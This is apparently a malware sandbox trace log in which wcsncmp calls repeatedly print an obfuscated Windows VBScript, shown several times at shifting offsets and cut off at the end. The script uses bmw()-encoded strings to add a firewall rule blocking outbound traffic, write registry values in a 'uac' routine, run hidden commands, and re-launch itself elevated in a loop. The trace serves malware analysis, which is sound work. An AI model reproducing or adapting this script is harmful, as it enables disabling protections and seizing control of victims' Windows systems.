_String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0226.354] wcsncmp (_String1="\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.354] wcsncmp (_String1="Dim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.354] wcsncmp (_String1="im newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.354] wcsncmp (_String1="m newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.354] wcsncmp (_String1=" newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 